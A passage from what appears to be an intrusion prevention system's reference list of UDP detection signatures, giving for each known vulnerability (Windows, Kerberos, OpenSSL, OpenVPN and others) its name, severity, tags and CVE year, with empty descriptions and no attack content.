About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: UDP Packet Unknown
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-387-4219
Vulnerability: Microsoft-Windows-DNS-Client-Service-CVE-2011-0657
Description:
Back to top

Generic_UDP-Microsoft-Windows-DNS-Server-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2007-11, CVE2007, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
Description:
Back to top

Generic_UDP-Microsoft-Windows-DNS-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2007-11, CVE2007, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1009-5242
Vulnerability: Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
Description:
Back to top

Generic_UDP-Microsoft-Windows-IKE-Ikeinitmmresponderphase1-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2023-01, CVE2023, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Microsoft-Windows-IKE-Ikeinitmmresponderphase1-Null-Pointer-Dereference
Description:
Back to top

Generic_UDP-Microsoft-Windows-IKE-Vendor-Id-CVE-2023-21547-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2023-01, CVE2023, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1591-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Microsoft-Windows-IKE-Vendor-Id-CVE-2023-21547-Null-Pointer-Dereference
Description:
Back to top

Generic_UDP-Microsoft-Windows-Internet-Key-Exchange-Protocol-Extensions-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in the Windows IKE extensions detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: Microsoft-Windows-Internet-Key-Exchange-Protocol-Extensions-Denial-of-Service
Description:
Back to top

Generic_UDP-Microsoft-Windows-NFS-Server-CVE-2020-17051

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows NFS server
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, MS2020-11, CVE2020, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Microsoft-Windows-NFS-Server-CVE-2020-17051
Description:
Back to top

Generic_UDP-Microsoft-Windows-NFS-Server-CVE-2020-17056

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows NFS server
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, MS2020-11, CVE2020, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Microsoft-Windows-NFS-Server-CVE-2020-17056
Description:
Back to top

Generic_UDP-Microsoft-Windows-NFS-Server-RCE-CVE-2021-26432

About this situation: An attempt to exploit a vulnerability in the Microsoft Windows NFS server
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, MS2021-08, CVE2021, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1376-5242
Last changed: sgpkg-ips-1376-5242
Vulnerability: Microsoft-Windows-NFS-Server-RCE-CVE-2021-26432
Description:
Back to top

Generic_UDP-Microsoft-Windows-QUIC-Version-Negotiation-Packet-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Core detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2023-10, CVE2023, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1674-5242
Last changed: sgpkg-ips-1674-5242
Vulnerability: Microsoft-Windows-QUIC-Version-Negotiation-Packet-Handling-Denial-Of-Service
Description:
Back to top

Generic_UDP-Microsoft-Windows-Remote-Desktop-Gateway-CVE-2020-0610-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2020-01, CVE2020, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1243-5242
Vulnerability: Microsoft-Windows-Remote-Desktop-Gateway-CVE-2020-0610-Code-Execution
Description:
Back to top

Generic_UDP-Microsoft-WINS-DoS

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, x86, CVE2003, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-598-5211
Vulnerability: Microsoft-WINS-DoS
Description:
Back to top

Generic_UDP-Microsoft-WPAD-Proxy-Discovery-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows Server, MS2016-06, CVE2016, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: Microsoft-WPAD-Proxy-Discovery-Privilege-Escalation
Description:
Back to top

Generic_UDP-Microsoft_Windows_Out_Of_Bounds_Vulnerability_CVE-2020-0609

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2020-01, CVE2020, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft_Windows_Out_Of_Bounds_Vulnerability_CVE-2020-0609
Description:
Back to top

Generic_UDP-MiniUPnP-Denial-Of-Service

About this situation: An attempt to exploit a MiniUPnP Denial Of Service vulnerability detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MiniUPnP, CVE2013, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1380-5242
Vulnerability: MiniUPnP-Denial-Of-Service
Description:
Back to top

Generic_UDP-MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos 5 detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service
Description:
Back to top

Generic_UDP-MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service

About this situation: An MIT Kerberos 5 Invalid RFC 1964 Token Denial of Service vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Vulnerability: MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service
Description:
Back to top

Generic_UDP-MIT-Kerberos-5-KDC-prep_reprocess_req-Null-Pointer-Dereference

About this situation: An MIT Kerberos 5 KDC prep_reprocess_req NULL Pointer Dereference vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2013, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: MIT-Kerberos-5-KDC-prep_reprocess_req-Null-Pointer-Dereference
Description:
Back to top

Generic_UDP-MIT-Kerberos-5-kpasswd-UDP-Ping-Pong-Denial-Of-Service

About this situation: An MIT Kerberos 5 kpasswd UDP Ping-Pong Denial Of Service vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2002, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: MIT-Kerberos-5-kpasswd-UDP-Ping-Pong-Denial-Of-Service
Description:
Back to top

Generic_UDP-MIT-Kerberos-KDC-Authentication-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2010, Any Operating System not specific, MIT Kerberos not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-288-4219
Vulnerability: MIT-Kerberos-KDC-Authentication-Denial-Of-Service
Description:
Back to top

Generic_UDP-MIT-Kerberos-KDC-Cross-Realm-Referral-Denial-of-Service

About this situation: An MIT Kerberos KDC Cross Realm Referral Denial of Service vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos 5, CVE2009, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: MIT-Kerberos-KDC-Cross-Realm-Referral-Denial-of-Service
Description:
Back to top

Generic_UDP-MIT-Kerberos-KDC-Null-Pointer-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2011, Any Operating System not specific, MIT Kerberos not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: MIT-Kerberos-KDC-Null-Pointer-Denial-Of-Service
Description:
Back to top

Generic_UDP-MIT-Kerberos-KDC-Ticket-Validation-Double-Free-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2010, Any Operating System not specific, MIT Kerberos not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: MIT-Kerberos-KDC-Ticket-Validation-Double-Free-Memory-Corruption
Description:
Back to top

Generic_UDP-MIT-Kerberos-V5-Kadmind-Klog_vsyslog-Server-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: OpenBSD, Ubuntu Linux, SUSE Linux, Red Hat Enterprise Linux, Gentoo Linux, Fedora Linux, Debian GNU/Linux, Red Hat Linux, Mandrake Linux, Any Hardware, MIT Kerberos, CVE2007, SUSE Linux not specific, Red Hat Enterprise Linux not specific, Debian GNU/Linux not specific, Red Hat Linux not specific, Mandrake Linux not specific, MIT Kerberos not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: MIT-Kerberos-V5-Kadmind-Klog_vsyslog-Server-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-MIT-KerberosAsn1_Decode_Generaltime-Uninitialized-Pointer-Reference

About this situation: An attempt to exploit a vulnerability in MIT Kerberos detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MIT Kerberos, CVE2009, Any Operating System not specific, MIT Kerberos not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: MIT-Kerberos-Asn1DecodeGeneraltime-Uninitialized-Pointer-Reference
Description:
Back to top

Generic_UDP-Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow

About this situation: Buffer overflow exploit against Motorola Timbuktu Pro on udp detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Motorola Timbuktu, CVE2007, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow
Description:
Back to top

Generic_UDP-MOXA-Device-Credential-Retrieval

About this situation: A Moxa Device Credential Retrieval vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Moxa NPort, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: MOXA-Device-Credential-Retrieval
Description:
Back to top

Generic_UDP-MS-Host-Integration-Server-Snabase.exe-Memory-Access-Error

About this situation: An attempt to exploit a vulnerability in Microsoft Host Integration Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Microsoft Host Integration Server, MS2011-04, CVE2011, Windows not specific, Microsoft Host Integration Server not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: MS-Host-Integration-Server-Snabase.exe-Memory-Access-Error
Description:
Back to top

Generic_UDP-MSRPC-Big-Endian-Byte-Order-Used

About this situation: Big endian byte order detected in MSRPC requests, possible IDS evasion attempt
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, x86, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-104-1314
Last changed: sgpkg-ips-625-5211
Vulnerability: MSRPC-Big-Endian-Byte-Order-Used
Description:
Back to top

Generic_UDP-MSRPC-Small-Fragments-Used

About this situation: Detects MSRPC traffic over UDP using small fragments
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, x86, Windows not specific, Attack Related Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-96-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: MSRPC-Small-Fragments-Used
Description:
Back to top

Generic_UDP-Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in HP-UX detected
Context: UDP Packet Unknown
Severity: 7
Tags: HP-UX, Any Hardware, CVE2010, HP-UX not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-690-5211
Vulnerability: Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption
Description:
Back to top

Generic_UDP-Nessus-Vulnerability-Scanner-Usage

About this situation: Detects UDP packets generated by the Nessus vulnerability scanner
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Nessus, Any Operating System not specific, Potential Probe
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: Nessus-Vulnerability-Scanner-Usage
Description:
Back to top

Generic_UDP-Netis-Router-Backdoor

About this situation: An attempt to exploit a known backdoor in Netis Routers detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-894-5242
Last changed: sgpkg-ips-894-5242
Vulnerability: Netis-Router-Backdoor
Description:
Back to top

Generic_UDP-NFS-Access-Reply-Access-To-Directory-Denied

About this situation: NFS Access Reply indicating access to directory denied detected
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-511-5211
Description:
Back to top

Generic_UDP-NFS-Rename-Call

About this situation: NFS Rename Call detected
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-511-5211
Description:
Back to top

Generic_UDP-Norton-Internet-Security-NBNS-Response-Processing-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Norton Internet Security detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Norton AntiSpam, Symantec Norton Personal Firewall, Symantec Norton Internet Security, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-419-4219
Vulnerability: Norton-Internet-Security-NBNS-Response-Processing-Stack-Overflow
Description:
Back to top

Generic_UDP-Novell-eDirectory-NCP-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-506-5211
Vulnerability: Novell-eDirectory-NCP-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell NetWare NFS Portmapper daemon over UDP detected
Context: UDP Packet Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-256-3038
Last changed: sgpkg-ips-256-3038
Vulnerability: Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow
Description:
Back to top

Generic_UDP-Novell-NetWare-Xnfs-Caller-Name-Xdrdecodestring-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: UDP Packet Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, CVE2011, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-437-4219
Vulnerability: Novell-NetWare-Xnfs.nlm-Caller-Name-Xdrdecodestring-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-Novell-NetWare-Xnfs.nlm-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: UDP Packet Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, CVE2010, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-381-4219
Vulnerability: Novell-NetWare-Xnfs.nlm-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: UDP Packet Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, CVE2011, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Novell Netware detected
Context: UDP Packet Unknown
Severity: 7
Tags: Novell NetWare, Any Hardware, CVE2011, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-744-5211
Vulnerability: Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow-2
Description:
Back to top

Generic_UDP-Novell-ZENworks-Configuration-Management-Preboot-Policy-Service-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell ZENworks Configuration Management detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Novell ZENworks Configuration Management, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1399-5242
Vulnerability: Novell-ZENworks-Configuration-Management-Preboot-Policy-Service-Buffer-Overflow
Description:
Back to top

Generic_UDP-OpenAFS-Getstatistics64-RPC-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenAFS.org OpenAFS detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenAFS, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-580-5211
Vulnerability: OpenAFS-Getstatistics64-RPC-Buffer-Overflow
Description:
Back to top

Generic_UDP-OpenSLP-Project-And-VMware-OpenSLP-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenSLP
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware ESXi Server, OpenSLP, VMWare Horizon, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: OpenSLP-Project-And-VMware-OpenSLP-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-OpenSSL-DTLS-Client-Hello-Zero-Fragment-Length

About this situation: DTLS Client Hello record with zero fragment length detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Vulnerability: OpenSSL-Dtls1_Process_Out_Of_Seq_Message-Denial-Of-Service
Description:
Back to top

Generic_UDP-OpenSSL-DTLS-Dtls1_Buffer_Record-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-681-5211
Vulnerability: OpenSSL-DTLS-Dtls1_Buffer_Record-Denial-Of-Service
Description:
Back to top

Generic_UDP-OpenSSL-DTLS-Handshake-Double-Free

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1000-5242
Vulnerability: OpenSSL-DTLS-Handshake-Double-Free
Description:
Back to top

Generic_UDP-OpenSSL-DTLS-Handshake-Memory-Exhaustion

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Vulnerability: OpenSSL-DTLS-Handshake-Memory-Exhaustion
Description:
Back to top

Generic_UDP-OpenSSL-DTLS-Packet-ChangeCipherSpec-Remote-DoS

About this situation: An attempt to exploit an OpenSSL DTLS Packet ChangeCipherSpec Remote DoS vulnerability detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2009, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-681-5211
Vulnerability: OpenSSL-DTLS-Packet-ChangeCipherSpec-Remote-DoS
Description:
Back to top

Generic_UDP-OpenSSL-Dtls1_Reassemble_Fragment-Invalid-Fragment-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-986-5242
Vulnerability: OpenSSL-Dtls1_Reassemble_Fragment-Invalid-Fragment-Buffer-Overflow
Description:
Back to top

Generic_UDP-OpenVPN-P_Control-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenVPN detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenVPN, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: OpenVPN-P_Control-Denial-Of-Service
Description:
Back to top

Generic_UDP-OpenVPN-Read_Key-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenVPN detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenVPN, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: OpenVPN-Read_Key-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_UDP-OpenVPN-Server-And-Client-Mss_fixup_IPv6-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenVPN Project OpenVPN detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, OpenVPN, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1009-5242
Vulnerability: OpenVPN-Server-And-Client-Mss_fixup_IPv6-Denial-Of-Service
Description:
Back to top

Generic_UDP-Out-Of-State-DNS-Response-With-Additional-Record

About this situation: Out of state DNS response with one or more additional records
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-371-4219
Vulnerability: DNS-Out-Of-State-DNS-Response-With-Additional-Record
Description:
Back to top

Generic_UDP-Palevo-Activity

About this situation: Palevo activity detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Palevo
Description:
Back to top

Generic_UDP-Plex-Media-Server-Reflection-DDoS-CVE-2021-33959

About this situation: An attempt to exploit a vulnerability in Plex Media Server detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Plex Media Server, CVE2021, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Plex-Media-Server-Reflection-DDoS-CVE-2021-33959
Description:
Back to top

Generic_UDP-PPStream-Media-Transfer

About this situation: Transfer of PPStream media detected
Context: UDP Packet Unknown
Severity: 1
Tags: Windows, Any Hardware, PPStream, Windows not specific, Streaming Protocols
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-183-2032
Vulnerability: PPStream-Media-Transfer
Description:
Back to top

Generic_UDP-Pro-Server-EX-Denial-Of-Service

About this situation: A vulnerability in Pro-Server EX allowing denial of service.
Context: UDP Packet Unknown
Severity: 2
